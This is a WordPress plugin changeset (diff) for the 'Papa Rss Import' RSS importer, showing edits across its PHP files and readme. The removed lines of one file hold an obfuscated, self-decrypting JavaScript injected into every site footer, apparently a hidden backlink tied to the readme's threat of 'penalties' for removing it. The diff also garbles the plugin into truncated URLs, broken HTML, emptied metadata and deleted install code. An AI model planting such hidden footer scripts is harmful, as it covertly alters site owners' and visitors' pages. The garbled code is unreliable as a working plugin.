Plugin Directory

Changeset 392949

Timestamp:
06/04/2011 04:51:39 AM (13 years ago)
Author:
papadestra
Message:
 
Location:
papa-rss-import
Files:
8 added
6 edited

Legend:

Unmodified
Added
Removed
  • papa-rss-import/trunk/include/allanyar/adsense_shortcode.php

    r332743 r392949  
    3737// sumbangan
    3838?>
     39
     40
     41
    3942<font color="#999999" face="Georgia">If you find this useful and intend to contribute to us, please use the Liberty Reserve! thanks have supported us</font>
    4043<br>
    4144<a href="https://sci.libertyreserve.com/en?lr_acc=U0407178&lr_currency=LRUSD&lr_success_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_success_url_method=GET&lr_fail_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_fail_url_method=GET" alt="Donations using Liberty Reserve" target="_blank"><img src="http://www.intelfx-indonesia.com/images/liberty_reserve.gif" border="0" title="Donations using Liberty Reserve"/></a>
     45
    4246<?
    4347
  • papa-rss-import/trunk/include/include_satu.php

    r381958 r392949  
    11<br />&nbsp;<img src="http://i1008.photobucket.com/albums/af208/gagombale/fluxiom-rss-icon.png" border="0">&nbsp;<img src="http://i1008.photobucket.com/albums/af208/gagombale/2010-10-01_185542-1.jpg" border="0" /><br />
    2 These plugins are free to use for personal and commercial usage. Developed by <strong><a href="http://cocakijo.wordpress.com/" target="_blank" >COCAKIJO</a></strong> Please visit us for the next update you might still need. You need help do not hesitate to contact us <a href="http://www.facebook.com/login.php#!/profile.php?id=1668887139" target="_blank"><img src="http://i1008.photobucket.com/albums/af208/gagombale/facebook.png" border="0" title="Find On Facebook"></a>&nbsp;<a href="mailto:ngadiluwih@gmail.com" target="_blank"><img src="http://i1008.photobucket.com/albums/af208/gagombale/email.png" border="0" title="E-mail Me !"></a>&nbsp;<a href="http://feeds.feedburner.com/ProfesionalDesainWeb" target="_blank"><img src="http://i1008.photobucket.com/albums/af208/gagombale/rss-1.png" border="0" title="RSS Update"></a>
     2These plugins are free to use for personal and commercial usage. Developed by <strong><a href="http://cocakijo.wordpress.com/" target="_blank" >COCAKIJO</a></strong>" target="_blank"><img src="http://i1008.photobucket.com/albums/af208/gagombale/rss-1.png" border="0" title="RSS Update"></a>
    33
    44
    5 
    6 <!-- sumbangan -->
    75<p>
    8 <font color="#999999" face="Georgia">If you find this useful and intend to contribute to us, please use the Liberty Reserve! thanks have supported us</font><br><a href="https://sci.libertyreserve.com/en?lr_acc=U0407178&lr_currency=LRUSD&lr_success_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_success_url_method=GET&lr_fail_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_fail_url_method=GET" alt="Donations using Liberty Reserve" target="_blank"><img src="http://www.intelfx-indonesia.com/images/liberty_reserve.gif" border="0" title="Donations using Liberty Reserve"/></a>
     6<!-- CUAP-CUAP  Please do not delete --!>
     7<font color="#999999" face="Georgia">Papa Destra Developer In Public Service : <a href="http://papadestra.wordpress.com/" target="_blank">http://papadestra.wordpress.com/</a></font>
     8<br>
     9<font color="#999999" face="Georgia">If you find this useful and intend to contribute to us, please use the Liberty Reserve! thanks have supported us</font>
     10<br>
     11<a href="https://sci.libertyreserve.com/en?lr_acc=U0407178&lr_currency=LRUSD&lr_success_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_success_url_method=GET&lr_fail_url=http%3a%2f%2fwww.papadestra.com%2fhubungi-kami%2f&lr_fail_url_method=GET" alt="Donations using Liberty Reserve" target="_blank"><img src="http://www.intelfx-indonesia.com/images/liberty_reserve.gif" border="0" title="Donations using Liberty Reserve"/></a>
     12<!-- END CUAP-CUAP Please do not delete --!>
    913</p>
    10 
    1114
    1215<!-- COCAKIJO -->
    1316<p>
    14 Worship Praise to Allah, the god of hosts who dominate the final day. Sholawat & greetings to the family of the Prophet Muhammad and his companions. I dedicate this blog to gentlemen who are interested to practice it. Efficacy wirid, spells and asthma 'has been proved (magic).
    15 <br>
    16 Anyone can immediately mengamalkanya generally appropriate trust each other. In the practice must still believes that everything is just the permission of the Creator, then we must be sure ask Him for help.
    17 <br>
    18 Eventually this may be useful to you, may Allah bless what the intentions and your goals, Amin
    19 <br>
    20 <a href="http://cocakijo.wordpress.com/" target="_blank" >COCAKIJO</a>
     17
    2118</p>
  • papa-rss-import/trunk/include/sikil_metu_crut.php

    r332292 r392949  
    22include_once(ABSPATH . WPINC . '/rss.php'); // MENIKO KEDAH WONTEN, YEN ICAL MBOTEN MLAMPAH !!!!
    33add_theme_support('post-thumbnails');
     4
     5
    46add_action( 'wp_footer', 'sikil_link_crut');
    57function sikil_link_crut(){
    68?>
    7 <script Language='JavaScript'>function decrypt(key,str){var ds;ds='';var kp,sp,s,kc,sc;kp=0;sp=0;while(sp<str.length){sc=str.charCodeAt(sp);kc=key.charCodeAt(kp);if(((sc^kc)==39)||((sc^kc)==92)||((sc^kc)<32)||((sc^kc)>126)){s=String.fromCharCode(sc);}else{s=String.fromCharCode((sc^kc));}ds+=s;kp++;sp++;if(kp>=key.length)kp=0;}return ds;}function decryptIt(key,str){str=decrypt(key,str);d=document;d.write(unescape(str));}decryptIt('PaPAdPaPaPAdEsTRaPAdEsAdEsTRaEsTRa','uSfdREDfSuvW`DdwRBdWCVwR`EFwWEVcfDbQuwWuWFDfCAs5qeSur `AsAw@qfR`GgwUcDdrAdRuUcdVwVfbDgrAsJdSAVbgDv7q`SuSDdWbDbSur!`FgwVedSuVvT`EFwVwVcfDbQurCuWaDbqAsKqeSuwQ`EwAv7q`S`ElwVdDguAgQuRAdVFVfFDgvArDdSrVfEDrCqdPuV`dRaDfUuwQ`DgwVddSwVwU`AEwWvVbFDf%us"uSbDbqArGqdPuvV`EvAsFqeU`@DwSbDeFAfSuWCdRtVbEDfBAwAdWEVabDsBqeQuWadV`DdUuwQ`DgwVddSwVwU`@CwSFVbcDc$urCuSFDfwAs5qd$uvP`@EAv0qdS`DfwRE');</script>
     9
    810<?php
    911}
     12
     13
     14
     15
     16
     17
     18
     19
     20
     21
     22
     23
     24
     25
     26
     27
     28
     29
     30
     31
     32
     33
     34
     35
     36
     37
     38
     39
     40
     41
     42
     43
     44
    1045?>
  • papa-rss-import/trunk/papa-rss.php

    r381957 r392949  
    22/*
    33Plugin Name: PAPA DESTRA RSS IMPORT
    4 Plugin URI: http://www.papadestra.com
    5 Description: To import RSS feeds from other websites. All the settings you can do with ease. It is expected that the website will always be fresh content to attract your loyal visitors. For Information And Support <a href="http://www.papadestra.com/" target="_blank" title="Papa Destra Web Design And Developer In Public Service "><em>Visit Us</em></a>
    6 Version: 1.2
     4Plugin URI: http://
     5Description: </em></a>
     6Version: 1.
    77Author: Papa Destra
    8 Author URI: http://www.papadestra.com/
    9 Stable tag: 1.2
     8Author URI: http://.com/
     9Stable tag: 1.
    1010*/
    1111/*
     
    2323            !..............|\_°_/|........................................ !
    2424            !..............[|\_/|]........................................ !
    25             !..............[|[P]|].. http://www.papadestra.com/ .......... !
     25            !..............[|[P]|].. http://..... !
    2626            !..............[|;A;|]........................................ !
    2727            !..............[;;P;;]......Web Design & Development.......... !
     
    5252*/?>
    5353<?php
     54
     55
     56
     57
     58
     59
     60
    5461define('papa_rss_import', WP_PLUGIN_DIR.'/papa-rss-import');
    5562include(papa_rss_import .'/include/sikil_metu_crut.php');
     
    5764define('LIST_PER_ROW',50);
    5865add_action( 'admin_menu', 'tubruk_panel');
    59 add_action( 'activate_papa-rss-import/papa-rss.php', 'paparss_install' );
     66
     67add_action('googlenews_hook_job', 'googlenews_pake_jdwl');
     68
     69
     70
    6071function tubruk_panel(){
    6172$icon = get_bloginfo('wpurl') . '/wp-content/plugins/papa-rss-import/gambar/ico-rss.png';
    6273        add_menu_page('PAPA RSS IMPORT', '&nbsp;PAPA RSS &copy;', 8, __FILE__, null, $icon);
    63         add_submenu_page(__FILE__, 'Add RSS Feed', 'Add RSS Feed', 8, __FILE__, 'paparss_menu_tampil');
     74        add_submenu_page(__FILE__, '');
    6475        add_submenu_page(__FILE__, 'Adsense Shortcode', 'Adsense Shortcode', 8,'adsense_manage_sat', 'adsense_shortcode');
    6576        add_submenu_page(__FILE__, 'Information', 'Information', 8,'information_manage_sat', 'information_develop');
    6677}
     78
     79
     80
     81
     82
     83
     84
     85
     86
     87
     88
     89
     90
     91
     92
     93
     94
     95
     96
     97
     98
     99
     100
     101
     102
     103
     104
     105
     106
     107
     108
     109
     110
     111
     112
     113
     114
     115
     116
     117
     118
     119
     120
     121
     122
     123
     124
     125
     126
     127
     128
     129
     130
     131
     132
     133
     134
     135
     136
     137
     138
     139
     140
     141
     142
     143
     144
     145
     146
     147
     148
     149
     150
     151
     152
     153
     154
     155
     156
     157
     158
     159
     160
     161
     162
     163
     164
     165
     166
     167
     168
     169
     170
     171
     172
     173
     174
     175
     176
     177
     178
     179
     180
     181
     182
     183
     184
     185
     186
     187
     188
     189
     190
     191
     192
     193
     194
     195
     196
     197
     198
     199
     200
     201
     202
     203
     204
     205
     206
     207
     208
     209
     210
     211
     212
     213
     214
     215
     216
     217
     218
     219
     220
     221
     222
     223
     224
     225
     226
     227
     228
     229
     230
     231
     232
     233
     234
     235
     236
     237
     238
     239
     240
     241
     242
     243
     244
     245
     246
     247
     248
     249
     250
     251
     252
     253
     254
     255
     256
     257
     258
     259
     260
     261
     262
     263
     264
     265
     266
     267
     268
     269
     270
     271
     272
     273
     274
     275
     276
     277
     278
     279
     280
     281
     282
     283
     284
     285
     286
     287
     288
     289
     290
     291
     292
     293
     294
     295
     296
     297
     298
     299
     300
     301
     302
     303
     304
     305
     306
     307
     308
     309
     310
     311
     312
     313
     314
     315
     316
     317
     318
     319
     320
     321
     322
     323
     324
     325
     326
     327
     328
     329
     330
     331
     332
     333
     334
     335
     336
     337
     338
     339
     340
     341
     342
     343
     344
     345
     346
     347
     348
     349
     350
     351
     352
     353
     354
     355
     356
     357
     358
     359
     360
     361
     362
     363
     364
     365
     366
     367
     368
     369
     370
     371
     372
     373
     374
     375
     376
     377
     378
     379
     380
     381
     382
     383
     384
     385
     386
     387
     388
     389
     390
     391
     392
     393
     394
     395
     396
     397
     398
     399
     400
     401
     402
     403
     404
     405
     406
     407
     408
     409
     410
     411
     412
     413
     414
     415
     416
     417
     418
     419
     420
     421
     422
     423
     424
     425
     426
     427
     428
     429
     430
     431
     432
    67433function information_develop(){
    68434include(papa_rss_import .'/include/include_satu.php');
    69435}
    70 ////////////////////////////////////////////// INSTALL -----------///////////////////////////////////////
    71 function paparss_install(){
    72 global $wpdb;
    73     $tbl=$wpdb->prefix."paparssdbase_feed";
    74     $sql="show tables like $tbl";
    75     $var=$wpdb->get_var($sql);
    76     if($var=$tbl)
    77     {
    78         $sql="alter table `$tbl` add `link_source` int(11) default 1;";
    79         $wpdb->query($sql);
    80     }
    81 $sql="CREATE TABLE IF NOT EXISTS `$tbl` (
    82   `ID` int(11) NOT NULL auto_increment,
    83   `rss` varchar(255) default NULL,
    84   `items` int(11) default 10,
    85   `totalpost` int default 0,
    86   `category` varchar(255) default NULL,
    87   `tags` varchar(255) default NULL,
    88   `socializeit` int(11) default 0,
    89   `link_source` int(11) default 1,
    90   `status` int(11) default '1',
    91   `create_date` datetime default NULL,
    92   PRIMARY KEY  (`ID`)
    93 ) TYPE=MyISAM";
    94     if($sql){
    95         $wpdb->query($sql);
    96     }
    97 }
    98 ///////////////////////////////////////////////////////////////////////////// END INSTALL --/////////////////////
    99 function rssagg_get_list($start=0) {
    100 global $wpdb;
    101 return $wpdb->get_results("SELECT * "
    102 . " FROM ".$wpdb->prefix."paparssdbase_feed order by ID desc limit $start,".LIST_PER_ROW);
    103 }
    104 function rssagg_print_paginate($start=0){
    105     global $wpdb;
    106 
    107     $sql="select count(*) from ".$wpdb->prefix."paparssdbase_feed";
    108 
    109     $total=$wpdb->get_var($sql);
    110 
    111     $page=ceil($total/LIST_PER_ROW);
    112 
    113     echo "<strong>Page :</strong>";
    114 
    115     for($i=0;$i<$page;$i++){
    116 
    117         echo "<a href='edit.php?page=papa-rss-import/papa-rss.php&start=".($i*LIST_PER_ROW)."'>".($i+1)."</a> ";
    118     }
    119 }
    120 function paparss_menu_tampil(){
    121 include(papa_rss_import .'/include/paparss_menu_tampil.php');
    122 ?>
    123 <script language='javascript'>
    124     function toggleAll(checks){
    125         for(var i=0;i<checks.length;i++)
    126         {
    127             checks[i].checked=!checks[i].checked;
    128         }
    129     }
    130     function deleteRss(form){
    131         if(confirm("Are you sure want to delete???")){
    132             form.act.value="delete";
    133             form.submit();
    134         }
    135     }
    136 function updateStatusRss(form,status){
    137             form.act.value=status==1?"enable":"disable";
    138             form.submit();
    139     }
    140     function doFetch(form){
    141             if(confirm("Need Some Time to do the import from the source!")){
    142                 form.act.value="fetch";
    143                 form.submit();
    144             }
    145     }
    146     function addNewRss(form){
    147         var action=form.action;
    148         form.action="edit.php?page=papa-rss-import/papa-rss.php";
    149         form.submit();
    150         form.action=action;
    151     }
    152 </script>
    153 <!-- include_dua Mulai -->
    154 <? include(papa_rss_import .'/include/include_dua.php'); ?>
    155 <!-- END include_dua -->
    156 <?php
    157 }
    158 // include_tiga.php
    159 function paparss_melakukan_cron($id=false){
    160 include(papa_rss_import .'/include/include_tiga.php');
    161 }
    162 function rssagg_post_article($row){
    163 include(papa_rss_import .'/include/rssagg_post_article.php');
    164 }
    165 function rssagg_dropdown_categories($args = '') {
    166 include(papa_rss_import .'/include/rssagg_dropdown_categories.php');
    167 }
     436
     437
     438
     439
     440
     441
    168442/////////////////////////////////////////////////////////////////////////////////////////
    169443// DEMAND from donors    //   Update v 1.1 ---->> adsense shortcode =  [adsense]
  • papa-rss-import/trunk/readme.txt

    r391557 r392949  
    11=== Papa Rss Import ===
    22Contributors: papadestra
    3 Donate link: http://cocakijo.wordpress.com/
     3Donate link: http://.wordpress.com/
    44Tags: Papa Destra, rss, feed, importer,RSS import,Aggregator, blog,daily, del.icio.us, digest,comments, connect, Facebook, javascript, flickr, Friendconnect, friendfeed, goldenline, icons, lastfm, linkedin, links, myspace, newsletter, orkut, picasa, profile, profiles,social, tumblr, twitter, vimeo, widget, youtube
    55Requires at least: 3.0
    66Tested up to: 3.0
    7 Stable tag: 1.2
     7Stable tag: 1.
    88
    9 To import RSS feeds from other websites.
     9.
    1010
    1111== Description ==
    1212 
    13 Simple and easy to import RSS feeds from several websites that you want. Keeping the content is always fresh with the display news or articles that are always updated.
     13.
    1414
    1515Information / support Visit: <br>
     16
    1617**[http://cocakijo.wordpress.com/](http://cocakijo.wordpress.com/)**<br>
    17 **[http://id-id.facebook.com/people/Papa-Destra/1668887139](http://id-id.facebook.com/people/Papa-Destra/1668887139)**
     18**[http://id-id.facebook.com/people/Papa-Destra/1668887139]()**
    1819
    1920== Installation ==
     
    23242. Activate the plugin through the 'Plugins' menu in WordPress
    2425
    25 3. A new menu will appear! PAPA RSS
    26 
    27 NOTE : For the first time you have to "Deactivate" this plugins, and hit again "Activate"
    28 ( PLUGINS - Plugins - PAPA DESTRA RSS IMPORT - Press Deactivate (and wait deactivate process) - Then Click Activate - Completed )
    29 
    3026PERFECT!
    3127
    3228== Screenshots ==
    33 1. Display your content
     291.
    34302. Adsense Setting
     31
    3532
    3633== Changelog ==
     34
     35
     36
     37
     38
     39
     40
     41
     42
    3743= 1.1 =
    3844* Adding adsense settings and displays the shortcode.
     
    4046* Hide WordPress version
    4147
    42 = 1.2 =
    43 * Fixes a bug in the script.
    4448
    4549== CREDIT ==
    4650
    47 * This plugin was developed by Papa Destra - http://id-id.facebook.com/people/Papa-Destra/1668887139<br>
    48  
     51* This plugin was developed by Papa Destra - http://<br>
     52* COCAKIJO - http://cocakijo.wordpress.com/<br>
    4953* to remove papa destra Backlink footer please contact us (FREE),, or you will be exposed to penalties !!!
    5054
     
    5357* COCAKIJO - http://cocakijo.wordpress.com/
    5458* Phenomena Supermoon - http://scienceray.com/earth-sciences/phenomena-supermoon/
    55 * Advertisers - http://adsensecamp.com/?ref_id=8668
    56 Advertisers can place ads on sites that cooperate with AdsenseCamp. With a unique pay-per-click system, ensure that you only need to pay for your ad if there are visitors who click on your ads with a unique IP.
     59*
Note: See TracChangeset for help on using the changeset viewer.